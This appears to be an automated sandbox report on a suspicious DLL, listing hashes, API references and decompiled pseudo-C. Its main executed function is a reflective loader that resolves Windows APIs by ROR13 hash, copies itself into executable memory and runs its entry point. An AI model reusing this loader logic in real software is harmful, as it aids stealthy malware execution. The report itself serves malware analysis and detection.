Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorLastWrite
String ID:
API String ID: 4006445483-0
Opcode ID: d75edb3758670edbe6a6e98919596064adbf5a1df50c21656a49d3d61efc5d3c
Instruction ID: 48ef6a590b44feebb615706110a8815898a5f17a9fa040d9f4e1cb8a715c328a
Opcode Fuzzy Hash: d75edb3758670edbe6a6e98919596064adbf5a1df50c21656a49d3d61efc5d3c
Instruction Fuzzy Hash: 61618972A28315CFE7148FA9CCA076A77A2EB8531CF04C939F6E5873C4F675D8058692

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2F49F, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6ED2F566
___AdjustPointer.LIBCMT ref: 6ED2F589
___AdjustPointer.LIBCMT ref: 6ED2F625

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f6072b8e8bbd484df1180bc72d98d998aebebd095cdf1937feb69c0d598cc481
Instruction ID: 2d89f324655b640c0a12a00200e31abdff026b2f2e735822fc9d39d8c3884cc9
Opcode Fuzzy Hash: f6072b8e8bbd484df1180bc72d98d998aebebd095cdf1937feb69c0d598cc481
Instruction Fuzzy Hash: F351B372505606EFEB158FA0D450BAA73A5FF4531CF304D3DDA55A7294EB31E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED32D87, Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6ED34073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ED361E2,?,00000000,-00000008), ref: 6ED3411F

GetLastError.KERNEL32 ref: 6ED32DEB
__dosmaperr.LIBCMT ref: 6ED32DF2
GetLastError.KERNEL32(?,?,?,?), ref: 6ED32E2C
__dosmaperr.LIBCMT ref: 6ED32E33

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 73b0008459ea5fd794a683ed431d3f9040784454ea4c3e6baf6ff8fa7bbb2fe1
Instruction ID: e9ddeb5971d280e136d335934afff413e0cf60602a0e80cc3f109edf58934a16
Opcode Fuzzy Hash: 73b0008459ea5fd794a683ed431d3f9040784454ea4c3e6baf6ff8fa7bbb2fe1
Instruction Fuzzy Hash: 52219571A04625EF9B519FE6DC8189BB7BDEF4336C7208929E854A7154D730EC4187E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED37EA6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000), ref: 6ED37EBD
GetLastError.KERNEL32(?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?,?,?,6ED370CD,?), ref: 6ED37EC9

Part of subcall function 6ED37E8F: CloseHandle.KERNEL32(FFFFFFFE,6ED37ED9,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?,?), ref: 6ED37E9F

___initconout.LIBCMT ref: 6ED37ED9

Part of subcall function 6ED37E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ED37E80,6ED37844,?,?,6ED36B46,?,?,00000000,?), ref: 6ED37E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ED37857,?,00000001,?,?,?,6ED36B46,?,?,00000000,?), ref: 6ED37EEE

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e72aba5166b914db9ae2a74d75dd9f01b4cd16ba8099e184ba010fe624616525
Instruction ID: 6cb4710687ae05c3a0623d5b2691d5ff4dafac4752119416e2aa3a65125af6c4
Opcode Fuzzy Hash: e72aba5166b914db9ae2a74d75dd9f01b4cd16ba8099e184ba010fe624616525
Instruction Fuzzy Hash: DBF0F236100A29FBDF621FD18C08A9E3F26EB0B7A4F114411FE18A55A0D732CD619BA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4520 Parent PID: 4600 rundll32.exeCOMMON

Executed Functions

Function 6ED2C050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6ED2C050(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				intOrPtr _t139;
				struct HDC__* _t144;
				void* _t152;
				signed int _t153;
				void* _t154;
				void* _t164;
				signed int _t167;
				signed int _t169;
				unsigned short _t171;
				void* _t176;
				signed int _t178;
				char _t189;
				void* _t192;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t207;
				intOrPtr _t208;
				void* _t209;
				void* _t210;
				signed int _t212;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed short _t230;
				void* _t235;
				signed int _t236;
				signed int _t237;
				void* _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				unsigned int _t262;
				intOrPtr* _t264;
				void* _t265;
				void* _t266;
				signed int* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t273;
				signed int _t277;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed char* _t289;
				intOrPtr _t290;
				signed int _t292;
				void* _t293;
				signed short* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;

				_t137 =  *0x6ed6d804; // 0x921d3f26
				 *(_t299 + 0x4c) = _t137 ^ _t299;
				_t255 =  *((intOrPtr*)(_t299 + 0x64));
				_push(0x400);
				 *((intOrPtr*)(_t299 + 0x2c)) = _t255;
				_t139 = E6ED2C70E(__eflags);
				_t256 =  *_t255;
				_t300 = _t299 + 4;
				_t202 = 0;
				 *((intOrPtr*)(_t300 + 0x2c)) = _t139;
				 *(_t300 + 0x24) = 0;
				 *(_t300 + 0x18) = 0;
				 *(_t300 + 0x20) = 0;
				L1:
				while(1) {
					if( *_t256 != 0x5a4d) {
						L4:
						_t256 = _t256 - 1;
						continue;
					}
					_t216 =  *((intOrPtr*)(_t256 + 0x3c));
					if(_t216 - 0x40 > 0x3bf ||  *((intOrPtr*)(_t216 + _t256)) != 0x4550) {
						goto L4;
					}
					 *((intOrPtr*)(_t300 + 0x14)) = _t256;
					_t292 =  *( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14);
					 *(_t300 + 0x1c) = _t292;
					__eflags = _t292;
					if(_t292 != 0) {
						do {
							_t289 =  *(_t292 + 0x28);
							_t236 = 0;
							__eflags = 0;
							_t250 =  *(_t292 + 0x24) & 0x0000ffff;
							do {
								_t271 =  *_t289 & 0x000000ff;
								asm("ror ecx, 0xd");
								__eflags =  *_t289 - 0x61;
								if( *_t289 >= 0x61) {
									_t236 = _t236 + 0xffffffe0;
									__eflags = _t236;
								}
								_t250 = _t250 + 0xffff;
								_t236 = _t236 + _t271;
								_t289 =  &(_t289[1]);
								__eflags = _t250;
							} while (_t250 != 0);
							__eflags = _t236 - 0x6a4abc5b;
							if(_t236 == 0x6a4abc5b) {
								_t290 =  *((intOrPtr*)(_t292 + 0x10));
								_t298 = 3;
								_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x3c)) + _t290 + 0x78)) + _t290;
								 *(_t300 + 0x10) = _t192;
								_t273 =  *((intOrPtr*)(_t192 + 0x20)) + _t290;
								_t215 =  *((intOrPtr*)(_t192 + 0x24)) + _t290;
								__eflags = _t215;
								do {
									_t252 =  *_t273 + _t290;
									_t193 = 0;
									__eflags = 0;
									_t237 =  *_t252;
									do {
										asm("ror eax, 0xd");
										_t252 = _t252 + 1;
										_t193 = _t193 + _t237;
										_t237 =  *_t252;
										__eflags = _t237;
									} while (_t237 != 0);
									__eflags = _t193 - 0xec0e4e8e;
									if(_t193 == 0xec0e4e8e) {
										L18:
										_t241 =  *((intOrPtr*)( *(_t300 + 0x10) + 0x1c)) + ( *_t215 & 0x0000ffff) * 4;
										__eflags = _t193 - 0xec0e4e8e;
										if(_t193 != 0xec0e4e8e) {
											__eflags = _t193 - 0x7c0dfcaa;
											if(_t193 != 0x7c0dfcaa) {
												__eflags = _t193 - 0x91afca54;
												if(_t193 == 0x91afca54) {
													_t196 =  *((intOrPtr*)(_t241 + _t290)) + 0x57 + _t290;
													__eflags = _t196;
													 *(_t300 + 0x20) = _t196;
												}
											} else {
												 *(_t300 + 0x18) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
											}
										} else {
											 *(_t300 + 0x24) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
										}
										_t298 = _t298 + 0xffff;
										__eflags = _t298;
									} else {
										__eflags = _t193 - 0x7c0dfcaa;
										if(_t193 == 0x7c0dfcaa) {
											goto L18;
										} else {
											__eflags = _t193 - 0x91afca54;
											if(_t193 == 0x91afca54) {
												goto L18;
											}
										}
									}
									_t273 = _t273 + 4;
									_t215 = _t215 + 2;
									__eflags = _t298;
								} while (_t298 != 0);
								_t202 =  *(_t300 + 0x18);
								_t292 =  *(_t300 + 0x1c);
							}
							__eflags =  *(_t300 + 0x24);
							if( *(_t300 + 0x24) == 0) {
								goto L30;
							} else {
								__eflags = _t202;
								if(_t202 == 0) {
									goto L30;
								} else {
									__eflags =  *(_t300 + 0x20);
									if( *(_t300 + 0x20) == 0) {
										goto L30;
									}
								}
							}
							break;
							L30:
							_t292 =  *_t292;
							 *(_t300 + 0x1c) = _t292;
							__eflags = _t292;
						} while (_t292 != 0);
						_t256 =  *((intOrPtr*)(_t300 + 0x14));
					}
					 *((intOrPtr*)(_t300 + 0x34)) = GetDC;
					_t144 = GetDC(0);
					 *(_t300 + 0x3c) = GetWindowRect;
					GetWindowRect(0, _t300 + 0x3c);
					 *((intOrPtr*)(_t300 + 0x40)) = ReleaseDC;
					ReleaseDC(0, _t144);
					_t204 =  *((intOrPtr*)(_t256 + 0x3c)) + _t256;
					 *((intOrPtr*)(_t300 + 0x38)) = _t204;
					CreateFileA("asd", 0, 0, 0, 0, 0, 0);
					 *((intOrPtr*)(_t300 + 0x30)) =  *(_t300 + 0x20) - GetLastError();
					_t152 = VirtualAlloc(0,  *(_t204 + 0x50), 0x3000, 0x40); // executed
					_t243 =  *(_t204 + 0x54);
					_t293 = _t152;
					 *(_t300 + 0x10) = _t293;
					_t219 = _t256;
					__eflags = _t243;
					if(_t243 != 0) {
						_t288 = _t293 - _t256;
						__eflags = _t288;
						do {
							_t189 =  *_t219;
							_t219 = _t219 + 1;
							 *((char*)(_t288 + _t219 - 1)) = _t189;
							_t243 = _t243 - 1;
							__eflags = _t243;
						} while (_t243 != 0);
					}
					_t258 = ( *(_t204 + 0x14) & 0x0000ffff) + _t204;
					_t205 =  *(_t204 + 6) & 0x0000ffff;
					__eflags = _t205;
					if(_t205 != 0) {
						_t270 = _t258 + 0x2c;
						__eflags = _t270;
						do {
							_t205 = _t205 - 1;
							 *((char*)((_t205 & 0x000003ff) +  *((intOrPtr*)(_t300 + 0x2c)))) =  *(_t300 + 0x20);
							_t235 =  *((intOrPtr*)(_t270 - 8)) + _t293;
							_t249 =  *_t270 +  *((intOrPtr*)(_t300 + 0x14));
							_t286 =  *(_t270 - 4);
							__eflags = _t286;
							if(_t286 != 0) {
								do {
									_t235 = _t235 + 1;
									 *((char*)(_t235 - 1)) =  *_t249;
									_t249 = _t249 + 1;
									_t286 = _t286 - 1;
									__eflags = _t286;
								} while (_t286 != 0);
							}
							_t270 = _t270 + 0x28;
							__eflags = _t205;
						} while (_t205 != 0);
					}
					_t207 =  *(_t300 + 0x1c) - 0xffffff80;
					_t260 = _t293 +  *_t207;
					 *((intOrPtr*)(_t300 + 0x14)) = _t260;
					_t153 =  *(_t260 + 0xc);
					__eflags = _t153;
					if(_t153 != 0) {
						while(1) {
							__eflags =  *_t207;
							if( *_t207 == 0) {
								goto L50;
							}
							_t297 =  *((intOrPtr*)(_t300 + 0x28))(_t293 + _t153);
							_t176 =  *(_t300 + 0x10);
							_t285 =  *_t260 + _t176;
							_t268 =  *((intOrPtr*)(_t260 + 0x10)) + _t176;
							__eflags =  *_t268;
							if( *_t268 != 0) {
								asm("o16 nop [eax+eax]");
								do {
									__eflags = _t285;
									if(_t285 == 0) {
										L47:
										_t207 = _t176 +  *_t268;
										__eflags = _t207;
										_t178 =  *(_t300 + 0x20)(_t297, _t207 + 2);
									} else {
										_t230 =  *_t285;
										__eflags = _t230;
										if(_t230 >= 0) {
											goto L47;
										} else {
											_t178 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x1c)) + ((_t230 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x10))) * 4 + _t297)) + _t297;
										}
									}
									 *_t268 = _t178;
									_t268 =  &(_t268[1]);
									__eflags = _t285;
									_t84 = _t285 + 4; // 0x4
									_t180 =  ==  ? _t285 : _t84;
									__eflags =  *_t268;
									_t285 =  ==  ? _t285 : _t84;
									_t176 =  *(_t300 + 0x10);
								} while ( *_t268 != 0);
							}
							_t293 =  *(_t300 + 0x10);
							_t260 =  *((intOrPtr*)(_t300 + 0x14)) + 0x14;
							 *((intOrPtr*)(_t300 + 0x14)) = _t260;
							_t153 =  *(_t260 + 0xc);
							__eflags = _t153;
							if(_t153 != 0) {
								continue;
							}
							goto L50;
						}
					}
					L50:
					_t154 =  *((intOrPtr*)(_t300 + 0x34))(0);
					 *(_t300 + 0x3c)(0, _t300 + 0x4c);
					 *((intOrPtr*)(_t300 + 0x40))(0, _t154);
					_t244 =  *(_t300 + 0x1c);
					_t262 = _t293 -  *((intOrPtr*)(_t244 + 0x34));
					__eflags =  *(_t244 + 0xa4);
					if( *(_t244 + 0xa4) != 0) {
						_t225 =  *((intOrPtr*)(_t244 + 0xa0)) + _t293;
						 *(_t300 + 0x18) = _t225;
						_t169 =  *(_t225 + 4);
						__eflags = _t169;
						if(_t169 != 0) {
							do {
								_t100 = _t169 - 8; // -8
								_t283 =  *_t225 + _t293;
								_t212 = _t100 >> 1;
								__eflags = _t212;
								_t296 = _t225 + 8;
								if(_t212 != 0) {
									do {
										_t245 =  *_t296 & 0x0000ffff;
										_t212 = _t212 - 1;
										_t226 = _t245;
										_t171 = _t245 >> 0xc;
										__eflags = _t171 - 0xa;
										if(_t171 != 0xa) {
											__eflags = _t171 - 3;
											if(_t171 != 3) {
												__eflags = _t171 - 1;
												if(_t171 != 1) {
													__eflags = _t171 - 2;
													if(_t171 == 2) {
														_t227 = _t226 & 0x00000fff;
														_t108 = _t227 + _t283;
														 *_t108 =  *(_t227 + _t283) + _t262;
														__eflags =  *_t108;
													}
												} else {
													 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + (_t262 >> 0x10);
												}
											} else {
												 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + _t262;
											}
										} else {
											 *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) + _t262;
										}
										_t296 =  &(_t296[1]);
										__eflags = _t212;
									} while (_t212 != 0);
									_t225 =  *(_t300 + 0x18);
									_t169 =  *(_t225 + 4);
								}
								_t293 =  *(_t300 + 0x10);
								_t225 = _t225 + _t169;
								 *(_t300 + 0x18) = _t225;
								_t169 =  *(_t225 + 4);
								__eflags = _t169;
							} while (_t169 != 0);
							_t244 =  *(_t300 + 0x1c);
						}
					}
					 *0x6ed6e168 = _t293;
					_t264 =  *((intOrPtr*)(_t244 + 0x28)) + _t293;
					_t277 =  *( *((intOrPtr*)(_t293 + 0x3c)) + _t293 + 0xc0);
					__eflags = _t277;
					if(_t277 != 0) {
						_t281 =  *(_t277 + _t293 + 0xc);
						__eflags = _t281;
						if(_t281 != 0) {
							_t167 =  *_t281;
							__eflags = _t167;
							while(_t167 != 0) {
								 *_t167(_t293, 1, 0);
								_t167 =  *(_t281 + 4);
								_t281 = _t281 + 4;
								__eflags = _t167;
							}
						}
					}
					_t208 =  *((intOrPtr*)(_t300 + 0x28));
					__eflags =  *(_t208 + 0x1c);
					if( *(_t208 + 0x1c) != 0) {
						 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
						goto L77;
					} else {
						_push( *((intOrPtr*)(_t208 + 4)));
						_push(_t293);
						_t279 = E6ED2BF10();
						_t300 = _t300 + 8;
						__eflags = _t279;
						if(_t279 == 0) {
							L77:
							_pop(_t265);
							_pop(_t278);
							_pop(_t209);
							__eflags =  *(_t300 + 0x5c) ^ _t300;
							return E6ED2C717( *((intOrPtr*)(_t300 + 0x28)), _t209,  *(_t300 + 0x5c) ^ _t300, _t244, _t265, _t278);
						} else {
							__eflags =  *(_t208 + 0x20);
							if( *(_t208 + 0x20) != 0) {
								E6ED2BFE0(_t293);
								_t300 = _t300 + 4;
							}
							 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
							_t164 =  *_t279( *((intOrPtr*)(_t208 + 0xc)),  *((intOrPtr*)(_t208 + 0x10)),  *((intOrPtr*)(_t208 + 0x14)),  *((intOrPtr*)(_t208 + 0x18)));
							_pop(_t266);
							_pop(_t280);
							_pop(_t210);
							__eflags =  *(_t300 + 0x4c) ^ _t300;
							return E6ED2C717(_t164, _t210,  *(_t300 + 0x4c) ^ _t300, _t244, _t266, _t280);
						}
					}
				}
			}

0x6ed2c053
0x6ed2c05a
0x6ed2c062
0x6ed2c066
0x6ed2c06b
0x6ed2c06f
0x6ed2c074
0x6ed2c076
0x6ed2c079
0x6ed2c07b
0x6ed2c07f
0x6ed2c08c
0x6ed2c090
0x00000000
0x6ed2c094
0x6ed2c097
0x6ed2c0af
0x6ed2c0af
0x00000000
0x6ed2c0af
0x6ed2c099
0x6ed2c0a4
0x00000000
0x00000000
0x6ed2c0b8
0x6ed2c0bf
0x6ed2c0c2
0x6ed2c0c6
0x6ed2c0c8
0x6ed2c0d0
0x6ed2c0d0
0x6ed2c0d3
0x6ed2c0d3
0x6ed2c0d5
0x6ed2c0e0
0x6ed2c0e0
0x6ed2c0e3
0x6ed2c0e6
0x6ed2c0e9
0x6ed2c0eb
0x6ed2c0eb
0x6ed2c0eb
0x6ed2c0ee
0x6ed2c0f4
0x6ed2c0f6
0x6ed2c0f7
0x6ed2c0f7
0x6ed2c0fc
0x6ed2c102
0x6ed2c108
0x6ed2c10b
0x6ed2c117
0x6ed2c119
0x6ed2c123
0x6ed2c125
0x6ed2c125
0x6ed2c127
0x6ed2c129
0x6ed2c12b
0x6ed2c12b
0x6ed2c12d
0x6ed2c130
0x6ed2c130
0x6ed2c133
0x6ed2c139
0x6ed2c13b
0x6ed2c13d
0x6ed2c13d
0x6ed2c141
0x6ed2c146
0x6ed2c156
0x6ed2c160
0x6ed2c163
0x6ed2c168
0x6ed2c175
0x6ed2c17a
0x6ed2c187
0x6ed2c18c
0x6ed2c194
0x6ed2c194
0x6ed2c196
0x6ed2c196
0x6ed2c17c
0x6ed2c181
0x6ed2c181
0x6ed2c16a
0x6ed2c16f
0x6ed2c16f
0x6ed2c19a
0x6ed2c19a
0x6ed2c148
0x6ed2c148
0x6ed2c14d
0x00000000
0x6ed2c14f
0x6ed2c14f
0x6ed2c154
0x00000000
0x00000000
0x6ed2c154
0x6ed2c14d
0x6ed2c1a0
0x6ed2c1a3
0x6ed2c1a6
0x6ed2c1a6
0x6ed2c1af
0x6ed2c1b3
0x6ed2c1b3
0x6ed2c1b7
0x6ed2c1bc
0x00000000
0x6ed2c1be
0x6ed2c1be
0x6ed2c1c0
0x00000000
0x6ed2c1c2
0x6ed2c1c2
0x6ed2c1c7
0x00000000
0x00000000
0x6ed2c1c7
0x6ed2c1c0
0x00000000
0x6ed2c1c9
0x6ed2c1c9
0x6ed2c1cc
0x6ed2c1d0
0x6ed2c1d0
0x6ed2c1d8
0x6ed2c1d8
0x6ed2c1e3
0x6ed2c1e7
0x6ed2c1f7
0x6ed2c1fb
0x6ed2c205
0x6ed2c209
0x6ed2c21a
0x6ed2c221
0x6ed2c225
0x6ed2c243
0x6ed2c247
0x6ed2c249
0x6ed2c24c
0x6ed2c24e
0x6ed2c252
0x6ed2c254
0x6ed2c256
0x6ed2c25a
0x6ed2c25a
0x6ed2c260
0x6ed2c260
0x6ed2c262
0x6ed2c265
0x6ed2c269
0x6ed2c269
0x6ed2c269
0x6ed2c260
0x6ed2c272
0x6ed2c274
0x6ed2c278
0x6ed2c27a
0x6ed2c27c
0x6ed2c27c
0x6ed2c280
0x6ed2c284
0x6ed2c290
0x6ed2c298
0x6ed2c29a
0x6ed2c29e
0x6ed2c2a1
0x6ed2c2a3
0x6ed2c2a5
0x6ed2c2a7
0x6ed2c2aa
0x6ed2c2ad
0x6ed2c2b0
0x6ed2c2b0
0x6ed2c2b0
0x6ed2c2a5
0x6ed2c2b5
0x6ed2c2b8
0x6ed2c2b8
0x6ed2c280
0x6ed2c2c0
0x6ed2c2c5
0x6ed2c2c7
0x6ed2c2cb
0x6ed2c2ce
0x6ed2c2d0
0x6ed2c2d6
0x6ed2c2d6
0x6ed2c2d9
0x00000000
0x00000000
0x6ed2c2e8
0x6ed2c2ea
0x6ed2c2ee
0x6ed2c2f3
0x6ed2c2f5
0x6ed2c2f8
0x6ed2c2fa
0x6ed2c300
0x6ed2c300
0x6ed2c302
0x6ed2c326
0x6ed2c328
0x6ed2c328
0x6ed2c32f
0x6ed2c304
0x6ed2c304
0x6ed2c306
0x6ed2c308
0x00000000
0x6ed2c30a
0x6ed2c322
0x6ed2c322
0x6ed2c308
0x6ed2c333
0x6ed2c335
0x6ed2c338
0x6ed2c33a
0x6ed2c33d
0x6ed2c340
0x6ed2c343
0x6ed2c345
0x6ed2c345
0x6ed2c300
0x6ed2c34f
0x6ed2c353
0x6ed2c356
0x6ed2c35a
0x6ed2c35d
0x6ed2c35f
0x00000000
0x00000000
0x00000000
0x6ed2c35f
0x6ed2c2d6
0x6ed2c365
0x6ed2c367
0x6ed2c374
0x6ed2c37b
0x6ed2c37f
0x6ed2c385
0x6ed2c388
0x6ed2c38f
0x6ed2c39b
0x6ed2c39d
0x6ed2c3a1
0x6ed2c3a4
0x6ed2c3a6
0x6ed2c3b0
0x6ed2c3b2
0x6ed2c3b5
0x6ed2c3b7
0x6ed2c3b7
0x6ed2c3b9
0x6ed2c3bc
0x6ed2c3c0
0x6ed2c3c0
0x6ed2c3c4
0x6ed2c3c8
0x6ed2c3ca
0x6ed2c3ce
0x6ed2c3d2
0x6ed2c3df
0x6ed2c3e3
0x6ed2c3f0
0x6ed2c3f4
0x6ed2c407
0x6ed2c40b
0x6ed2c40d
0x6ed2c413
0x6ed2c413
0x6ed2c413
0x6ed2c413
0x6ed2c3f6
0x6ed2c401
0x6ed2c401
0x6ed2c3e5
0x6ed2c3eb
0x6ed2c3eb
0x6ed2c3d4
0x6ed2c3da
0x6ed2c3da
0x6ed2c417
0x6ed2c41a
0x6ed2c41a
0x6ed2c41e
0x6ed2c422
0x6ed2c422
0x6ed2c425
0x6ed2c429
0x6ed2c42b
0x6ed2c42f
0x6ed2c432
0x6ed2c432
0x6ed2c43a
0x6ed2c43a
0x6ed2c3a6
0x6ed2c441
0x6ed2c447
0x6ed2c44c
0x6ed2c453
0x6ed2c455
0x6ed2c457
0x6ed2c45b
0x6ed2c45d
0x6ed2c45f
0x6ed2c461
0x6ed2c463
0x6ed2c46a
0x6ed2c46c
0x6ed2c46f
0x6ed2c472
0x6ed2c472
0x6ed2c463
0x6ed2c45d
0x6ed2c476
0x6ed2c47a
0x6ed2c47e
0x6ed2c4d2
0x00000000
0x6ed2c480
0x6ed2c480
0x6ed2c483
0x6ed2c489
0x6ed2c48b
0x6ed2c48e
0x6ed2c490
0x6ed2c4d4
0x6ed2c4dc
0x6ed2c4dd
0x6ed2c4df
0x6ed2c4e0
0x6ed2c4ea
0x6ed2c492
0x6ed2c492
0x6ed2c496
0x6ed2c499
0x6ed2c49e
0x6ed2c49e
0x6ed2c4a8
0x6ed2c4b6
0x6ed2c4b8
0x6ed2c4b9
0x6ed2c4bb
0x6ed2c4c0
0x6ed2c4ca
0x6ed2c4ca
0x6ed2c490
0x6ed2c47e

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ED2C225
GetLastError.KERNEL32 ref: 6ED2C22B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6ED2C247

Strings

asd, xrefs: 6ED2C21C

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 1d4a2850345daad4fcdb060f8d950a5943699dbac096fbe65a1e893492f01cb4
Instruction ID: aa711dee03fac09ca43a1929102e52cd5a08ca30478b20ccc522108e3cf013f4
Opcode Fuzzy Hash: 1d4a2850345daad4fcdb060f8d950a5943699dbac096fbe65a1e893492f01cb4
Instruction Fuzzy Hash: 72E18971A08306CFDB50CF98C890B2AB7E1BF88708F15496DEA958F385D771E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2C8DB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6ED2C8DB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;
				void* _t89;

				_t89 = __fp0;
				_t68 = __edx;
				_push(0x10);
				_push(0x6ed6af80);
				E6ED2D350(__ebx, __edi, __esi);
				_t34 =  *0x6ed6e174; // 0x0
				if(_t34 > 0) {
					 *0x6ed6e174 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6ED2CF32();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6ed6e4b8 - 2;
					if( *0x6ed6e4b8 != 2) {
						E6ED2D1CC(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6ed6afa8);
						E6ED2D350(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6ED2CA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6ED2C781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
